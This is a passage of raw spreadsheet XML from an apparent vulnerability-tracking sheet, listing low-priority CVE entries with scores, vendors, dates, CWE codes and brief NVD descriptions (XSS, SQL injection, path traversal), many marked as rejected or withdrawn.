        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L6030" s="5" t="inlineStr">
        <is>
          <t>A  security bypass vulnerability in the Account Protection feature of Palo Alto Networks Prisma® Browser enables a user to bypass intended security controls.</t>
        </is>
      </c>
      <c r="M6030" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0289</t>
        </is>
      </c>
    </row>
    <row r="6031">
      <c r="A6031" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6031" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0290</t>
        </is>
      </c>
      <c r="C6031" s="5" t="n">
        <v>0.5</v>
      </c>
      <c r="D6031" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6031" s="5" t="inlineStr"/>
      <c r="F6031" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6031" s="5" t="inlineStr">
        <is>
          <t>palo alto</t>
        </is>
      </c>
      <c r="H6031" s="5" t="inlineStr">
        <is>
          <t>paloaltonetworks:prisma_browser</t>
        </is>
      </c>
      <c r="I6031" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J6031" s="5" t="inlineStr"/>
      <c r="K6031" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L6031" s="5" t="inlineStr">
        <is>
          <t>An information disclosure vulnerability in the Account Protection feature of  Palo Alto Networks Prisma® Browser enables a local attacker to view sensitive data.</t>
        </is>
      </c>
      <c r="M6031" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0290</t>
        </is>
      </c>
    </row>
    <row r="6032">
      <c r="A6032" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6032" s="5" t="inlineStr">
        <is>
          <t>CVE-2021-47996</t>
        </is>
      </c>
      <c r="C6032" s="5" t="inlineStr"/>
      <c r="D6032" s="5" t="inlineStr"/>
      <c r="E6032" s="5" t="inlineStr"/>
      <c r="F6032" s="5" t="inlineStr"/>
      <c r="G6032" s="5" t="inlineStr"/>
      <c r="H6032" s="5" t="inlineStr"/>
      <c r="I6032" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J6032" s="5" t="inlineStr"/>
      <c r="K6032" s="5" t="inlineStr"/>
      <c r="L6032" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected as a duplicate.</t>
        </is>
      </c>
      <c r="M6032" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2021-47996</t>
        </is>
      </c>
    </row>
    <row r="6033">
      <c r="A6033" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6033" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-26962</t>
        </is>
      </c>
      <c r="C6033" s="5" t="inlineStr"/>
      <c r="D6033" s="5" t="inlineStr"/>
      <c r="E6033" s="5" t="inlineStr"/>
      <c r="F6033" s="5" t="inlineStr"/>
      <c r="G6033" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H6033" s="5" t="inlineStr"/>
      <c r="I6033" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J6033" s="5" t="inlineStr"/>
      <c r="K6033" s="5" t="inlineStr"/>
      <c r="L6033" s="5" t="inlineStr">
        <is>
          <t>Italtel NFV 11.1.2-20210318 allows Multiple Stored XSS under NP_BCCAS-RMCTRL-01/IMCSCIWebGui/configuration.jsp?opration=list&amp;object=announcementAS via the name, username, or mrfAnnouncementNameparameter. A malicious user leveraging this vulnerability could inject arbitrary JavaScript. The malicious payload will then be triggered every time an authenticated user browses the page containing it.</t>
        </is>
      </c>
      <c r="M6033" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-26962</t>
        </is>
      </c>
    </row>
    <row r="6034">
      <c r="A6034" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6034" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-35497</t>
        </is>
      </c>
      <c r="C6034" s="5" t="inlineStr"/>
      <c r="D6034" s="5" t="inlineStr"/>
      <c r="E6034" s="5" t="inlineStr"/>
      <c r="F6034" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G6034" s="5" t="inlineStr"/>
      <c r="H6034" s="5" t="inlineStr"/>
      <c r="I6034" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J6034" s="5" t="inlineStr"/>
      <c r="K6034" s="5" t="inlineStr"/>
      <c r="L6034" s="5" t="inlineStr">
        <is>
          <t>In Trimble TM4WEB 21.4.0.4 due to security misconfiguration with session identifiers, it is possible to recover valid session cookies via reflected cross-site scripting affecting the external document viewer endpoint.</t>
        </is>
      </c>
      <c r="M6034" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-35497</t>
        </is>
      </c>
    </row>
    <row r="6035">
      <c r="A6035" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6035" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-50998</t>
        </is>
      </c>
      <c r="C6035" s="5" t="inlineStr"/>
      <c r="D6035" s="5" t="inlineStr"/>
      <c r="E6035" s="5" t="inlineStr"/>
      <c r="F6035" s="5" t="inlineStr"/>
      <c r="G6035" s="5" t="inlineStr"/>
      <c r="H6035" s="5" t="inlineStr"/>
      <c r="I6035" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J6035" s="5" t="inlineStr"/>
      <c r="K6035" s="5" t="inlineStr"/>
      <c r="L6035" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected as a duplicate.</t>
        </is>
      </c>
      <c r="M6035" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-50998</t>
        </is>
      </c>
    </row>
    <row r="6036">
      <c r="A6036" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6036" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-50999</t>
        </is>
      </c>
      <c r="C6036" s="5" t="inlineStr"/>
      <c r="D6036" s="5" t="inlineStr"/>
      <c r="E6036" s="5" t="inlineStr"/>
      <c r="F6036" s="5" t="inlineStr"/>
      <c r="G6036" s="5" t="inlineStr"/>
      <c r="H6036" s="5" t="inlineStr"/>
      <c r="I6036" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J6036" s="5" t="inlineStr"/>
      <c r="K6036" s="5" t="inlineStr"/>
      <c r="L6036" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected as a duplicate.</t>
        </is>
      </c>
      <c r="M6036" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-50999</t>
        </is>
      </c>
    </row>
    <row r="6037">
      <c r="A6037" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6037" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51000</t>
        </is>
      </c>
      <c r="C6037" s="5" t="inlineStr"/>
      <c r="D6037" s="5" t="inlineStr"/>
      <c r="E6037" s="5" t="inlineStr"/>
      <c r="F6037" s="5" t="inlineStr"/>
      <c r="G6037" s="5" t="inlineStr"/>
      <c r="H6037" s="5" t="inlineStr"/>
      <c r="I6037" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J6037" s="5" t="inlineStr"/>
      <c r="K6037" s="5" t="inlineStr"/>
      <c r="L6037" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected as a duplicate.</t>
        </is>
      </c>
      <c r="M6037" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51000</t>
        </is>
      </c>
    </row>
    <row r="6038">
      <c r="A6038" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6038" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54354</t>
        </is>
      </c>
      <c r="C6038" s="5" t="inlineStr"/>
      <c r="D6038" s="5" t="inlineStr"/>
      <c r="E6038" s="5" t="inlineStr"/>
      <c r="F6038" s="5" t="inlineStr"/>
      <c r="G6038" s="5" t="inlineStr"/>
      <c r="H6038" s="5" t="inlineStr"/>
      <c r="I6038" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J6038" s="5" t="inlineStr"/>
      <c r="K6038" s="5" t="inlineStr"/>
      <c r="L6038" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected as a duplicate.</t>
        </is>
      </c>
      <c r="M6038" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54354</t>
        </is>
      </c>
    </row>
    <row r="6039">
      <c r="A6039" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6039" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-7049</t>
        </is>
      </c>
      <c r="C6039" s="5" t="inlineStr"/>
      <c r="D6039" s="5" t="inlineStr"/>
      <c r="E6039" s="5" t="inlineStr"/>
      <c r="F6039" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G6039" s="5" t="inlineStr"/>
      <c r="H6039" s="5" t="inlineStr"/>
      <c r="I6039" s="5" t="inlineStr">
        <is>
          <t>2024-10-10</t>
        </is>
      </c>
      <c r="J6039" s="5" t="inlineStr"/>
      <c r="K6039" s="5" t="inlineStr"/>
      <c r="L6039" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="M6039" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-7049</t>
        </is>
      </c>
    </row>
    <row r="6040">
      <c r="A6040" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6040" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-57231</t>
        </is>
      </c>
      <c r="C6040" s="5" t="inlineStr"/>
      <c r="D6040" s="5" t="inlineStr"/>
      <c r="E6040" s="5" t="inlineStr"/>
      <c r="F6040" s="5" t="inlineStr"/>
      <c r="G6040" s="5" t="inlineStr"/>
      <c r="H6040" s="5" t="inlineStr"/>
      <c r="I6040" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J6040" s="5" t="inlineStr"/>
      <c r="K6040" s="5" t="inlineStr"/>
      <c r="L6040" s="5" t="inlineStr">
        <is>
          <t>Path Traversal in avatar attachments in Docmost v0.21.0 allows an unauthenticated malicious actor to disclose local files via a POST Request in a public url.</t>
        </is>
      </c>
      <c r="M6040" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-57231</t>
        </is>
      </c>
    </row>
    <row r="6041">
      <c r="A6041" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6041" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24442</t>
        </is>
      </c>
      <c r="C6041" s="5" t="inlineStr"/>
      <c r="D6041" s="5" t="inlineStr"/>
      <c r="E6041" s="5" t="inlineStr"/>
      <c r="F6041" s="5" t="inlineStr"/>
      <c r="G6041" s="5" t="inlineStr"/>
      <c r="H6041" s="5" t="inlineStr"/>
      <c r="I6041" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6041" s="5" t="inlineStr"/>
      <c r="K6041" s="5" t="inlineStr"/>
      <c r="L6041" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="M6041" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24442</t>
        </is>
      </c>
    </row>
    <row r="6042">
      <c r="A6042" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6042" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26350</t>
        </is>
      </c>
      <c r="C6042" s="5" t="inlineStr"/>
      <c r="D6042" s="5" t="inlineStr"/>
      <c r="E6042" s="5" t="inlineStr"/>
      <c r="F6042" s="5" t="inlineStr"/>
      <c r="G6042" s="5" t="inlineStr"/>
      <c r="H6042" s="5" t="inlineStr"/>
      <c r="I6042" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6042" s="5" t="inlineStr"/>
      <c r="K6042" s="5" t="inlineStr"/>
      <c r="L6042" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="M6042" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26350</t>
        </is>
      </c>
    </row>
    <row r="6043">
      <c r="A6043" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6043" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28523</t>
        </is>
      </c>
      <c r="C6043" s="5" t="inlineStr"/>
      <c r="D6043" s="5" t="inlineStr"/>
      <c r="E6043" s="5" t="inlineStr"/>
      <c r="F6043" s="5" t="inlineStr"/>
      <c r="G6043" s="5" t="inlineStr"/>
      <c r="H6043" s="5" t="inlineStr"/>
      <c r="I6043" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6043" s="5" t="inlineStr"/>
      <c r="K6043" s="5" t="inlineStr"/>
      <c r="L6043" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="M6043" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28523</t>
        </is>
      </c>
    </row>
    <row r="6044">
      <c r="A6044" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6044" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34412</t>
        </is>
      </c>
      <c r="C6044" s="5" t="inlineStr"/>
      <c r="D6044" s="5" t="inlineStr"/>
      <c r="E6044" s="5" t="inlineStr"/>
      <c r="F6044" s="5" t="inlineStr"/>
      <c r="G6044" s="5" t="inlineStr"/>
      <c r="H6044" s="5" t="inlineStr"/>
      <c r="I6044" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6044" s="5" t="inlineStr"/>
      <c r="K6044" s="5" t="inlineStr"/>
      <c r="L6044" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="M6044" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34412</t>
        </is>
      </c>
    </row>
    <row r="6045">
      <c r="A6045" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6045" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-36392</t>
        </is>
      </c>
      <c r="C6045" s="5" t="inlineStr"/>
      <c r="D6045" s="5" t="inlineStr"/>
      <c r="E6045" s="5" t="inlineStr"/>
      <c r="F6045" s="5" t="inlineStr"/>
      <c r="G6045" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H6045" s="5" t="inlineStr"/>
      <c r="I6045" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J6045" s="5" t="inlineStr"/>
      <c r="K6045" s="5" t="inlineStr"/>
      <c r="L6045" s="5" t="inlineStr">
        <is>
          <t>FairSketch Rise CRM Version 3.9.6 is vulnerable to Cross Site Scripting (XSS). An authenticated administrator can inject arbitrary JavaScript into an item's title, which is stored server-side and executed in the browser of any client user who visits the store page, enabling session hijacking, account takeover, and phishing.</t>
        </is>
      </c>
      <c r="M6045" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-36392</t>
        </is>
      </c>
    </row>
    <row r="6046">
      <c r="A6046" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6046" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38626</t>
        </is>
      </c>
      <c r="C6046" s="5" t="inlineStr"/>
      <c r="D6046" s="5" t="inlineStr"/>
      <c r="E6046" s="5" t="inlineStr"/>
      <c r="F6046" s="5" t="inlineStr"/>
      <c r="G6046" s="5" t="inlineStr"/>
      <c r="H6046" s="5" t="inlineStr"/>
      <c r="I6046" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J6046" s="5" t="inlineStr"/>
      <c r="K6046" s="5" t="inlineStr"/>
      <c r="L6046" s="5" t="inlineStr">
        <is>
          <t>Garlic-Hub v1.0.1 is vulnerable to SQL Injection in src/Modules/Items/Repositories/ItemsRepository.php.</t>
        </is>
      </c>
      <c r="M6046" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38626</t>
        </is>
      </c>
    </row>
    <row r="6047">
      <c r="A6047" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6047" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38998</t>
        </is>
      </c>
      <c r="C6047" s="5" t="inlineStr"/>
      <c r="D6047" s="5" t="inlineStr"/>
      <c r="E6047" s="5" t="inlineStr"/>
      <c r="F6047" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6047" s="5" t="inlineStr"/>
      <c r="H6047" s="5" t="inlineStr"/>
      <c r="I6047" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6047" s="5" t="inlineStr"/>
      <c r="K6047" s="5" t="inlineStr"/>
      <c r="L6047" s="5" t="inlineStr">
        <is>
          <t>A use-after-free in the SocketDescriptor::tcpReadHandler1 function (liveMedia/RTPInterface.cpp) of LIVE555 Streaming Media (version 2026.02.26) allows attackers to cause a Denial of Service (DoS) via sending a series of crafted RTSP and HTTP requests to the server.</t>
        </is>
      </c>
      <c r="M6047" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38998</t>
        </is>
      </c>
    </row>
    <row r="6048">
      <c r="A6048" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6048" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43635</t>
        </is>
      </c>
      <c r="C6048" s="5" t="inlineStr"/>
      <c r="D6048" s="5" t="inlineStr"/>
      <c r="E6048" s="5" t="inlineStr"/>
      <c r="F6048" s="5" t="inlineStr"/>
      <c r="G6048" s="5" t="inlineStr"/>
      <c r="H6048" s="5" t="inlineStr"/>
      <c r="I6048" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6048" s="5" t="inlineStr"/>
      <c r="K6048" s="5" t="inlineStr"/>
      <c r="L6048" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="M6048" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43635</t>
        </is>
      </c>
    </row>
    <row r="6049">
      <c r="A6049" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6049" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43645</t>
        </is>
      </c>
      <c r="C6049" s="5" t="inlineStr"/>
      <c r="D6049" s="5" t="inlineStr"/>
      <c r="E6049" s="5" t="inlineStr"/>
      <c r="F6049" s="5" t="inlineStr"/>
      <c r="G6049" s="5" t="inlineStr"/>
      <c r="H6049" s="5" t="inlineStr"/>
      <c r="I6049" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6049" s="5" t="inlineStr"/>
      <c r="K6049" s="5" t="inlineStr"/>
      <c r="L6049" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="M6049" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43645</t>
        </is>
      </c>
    </row>
    <row r="6050">
      <c r="A6050" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6050" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45219</t>
        </is>
      </c>
      <c r="C6050" s="5" t="inlineStr"/>
      <c r="D6050" s="5" t="inlineStr"/>
      <c r="E6050" s="5" t="inlineStr"/>
      <c r="F6050" s="5" t="inlineStr"/>
      <c r="G6050" s="5" t="inlineStr"/>
      <c r="H6050" s="5" t="inlineStr"/>
      <c r="I6050" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J6050" s="5" t="inlineStr"/>
      <c r="K6050" s="5" t="inlineStr"/>
      <c r="L6050" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="M6050" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45219</t>
        </is>
      </c>
    </row>
    <row r="6051">
      <c r="A6051" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6051" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45220</t>
        </is>
      </c>
      <c r="C6051" s="5" t="inlineStr"/>
      <c r="D6051" s="5" t="inlineStr"/>
      <c r="E6051" s="5" t="inlineStr"/>
      <c r="F6051" s="5" t="inlineStr"/>
      <c r="G6051" s="5" t="inlineStr"/>
      <c r="H6051" s="5" t="inlineStr"/>
      <c r="I6051" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J6051" s="5" t="inlineStr"/>
      <c r="K6051" s="5" t="inlineStr"/>
      <c r="L6051" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="M6051" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45220</t>
        </is>
      </c>
    </row>
    <row r="6052">
      <c r="A6052" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6052" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4765</t>
        </is>
      </c>
      <c r="C6052" s="5" t="n">
        <v>0</v>
      </c>
      <c r="D6052" s="5" t="inlineStr">
        <is>
          <t>NONE</t>
        </is>
      </c>
      <c r="E6052" s="5" t="inlineStr"/>
      <c r="F6052" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G6052" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H6052" s="5" t="inlineStr"/>
      <c r="I6052" s="5" t="inlineStr">
        <is>
          <t>2026-07-13</t>
        </is>
      </c>
      <c r="J6052" s="5" t="inlineStr"/>
      <c r="K6052" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L6052" s="5" t="inlineStr">
        <is>
          <t>Self Cross-Site Scripting (Self-XSS) vulnerability in the RD Station Conversas chat feature. The vulnerability lies in the ‘name’ parameter of the initialisation process due to incorrect sanitisation of user-supplied input. Exploitation allows specially crafted JavaScript code to be injected, which is executed within the context of the user’s own session who provides the payload. The demonstrated impact is limited to the user who enters and executes the payload.</t>
        </is>
      </c>
      <c r="M6052" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4765</t>
        </is>
      </c>
    </row>
    <row r="6053">
      <c r="A6053" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6053" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49153</t>
        </is>
      </c>
      <c r="C6053" s="5" t="inlineStr"/>
      <c r="D6053" s="5" t="inlineStr"/>
      <c r="E6053" s="5" t="inlineStr"/>
      <c r="F6053" s="5" t="inlineStr"/>
      <c r="G6053" s="5" t="inlineStr"/>
      <c r="H6053" s="5" t="inlineStr"/>
      <c r="I6053" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J6053" s="5" t="inlineStr"/>
      <c r="K6053" s="5" t="inlineStr"/>
      <c r="L6053" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="M6053" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49153</t>
        </is>
      </c>
    </row>
    <row r="6054">
      <c r="A6054" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6054" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49154</t>
        </is>
      </c>
      <c r="C6054" s="5" t="inlineStr"/>
      <c r="D6054" s="5" t="inlineStr"/>
      <c r="E6054" s="5" t="inlineStr"/>
      <c r="F6054" s="5" t="inlineStr"/>
      <c r="G6054" s="5" t="inlineStr"/>
      <c r="H6054" s="5" t="inlineStr"/>
      <c r="I6054" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J6054" s="5" t="inlineStr"/>
      <c r="K6054" s="5" t="inlineStr"/>
      <c r="L6054" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="M6054" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49154</t>
        </is>
      </c>
    </row>
    <row r="6055">
      <c r="A6055" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6055" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49155</t>
        </is>
      </c>
      <c r="C6055" s="5" t="inlineStr"/>
      <c r="D6055" s="5" t="inlineStr"/>
      <c r="E6055" s="5" t="inlineStr"/>
      <c r="F6055" s="5" t="inlineStr"/>
      <c r="G6055" s="5" t="inlineStr"/>
      <c r="H6055" s="5" t="inlineStr"/>
      <c r="I6055" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J6055" s="5" t="inlineStr"/>
      <c r="K6055" s="5" t="inlineStr"/>
      <c r="L6055" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="M6055" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49155</t>
        </is>
      </c>
    </row>
    <row r="6056">
      <c r="A6056" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6056" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49156</t>
        </is>
      </c>
      <c r="C6056" s="5" t="inlineStr"/>
      <c r="D6056" s="5" t="inlineStr"/>
      <c r="E6056" s="5" t="inlineStr"/>
      <c r="F6056" s="5" t="inlineStr"/>
      <c r="G6056" s="5" t="inlineStr"/>
      <c r="H6056" s="5" t="inlineStr"/>
      <c r="I6056" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J6056" s="5" t="inlineStr"/>
      <c r="K6056" s="5" t="inlineStr"/>
      <c r="L6056" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="M6056" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49156</t>
        </is>
      </c>
    </row>
    <row r="6057">
      <c r="A6057" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6057" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49947</t>
        </is>
      </c>
      <c r="C6057" s="5" t="inlineStr"/>
      <c r="D6057" s="5" t="inlineStr"/>
      <c r="E6057" s="5" t="inlineStr"/>
      <c r="F6057" s="5" t="inlineStr"/>
      <c r="G6057" s="5" t="inlineStr"/>
      <c r="H6057" s="5" t="inlineStr"/>
      <c r="I6057" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6057" s="5" t="inlineStr"/>
      <c r="K6057" s="5" t="inlineStr"/>
      <c r="L6057" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="M6057" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49947</t>
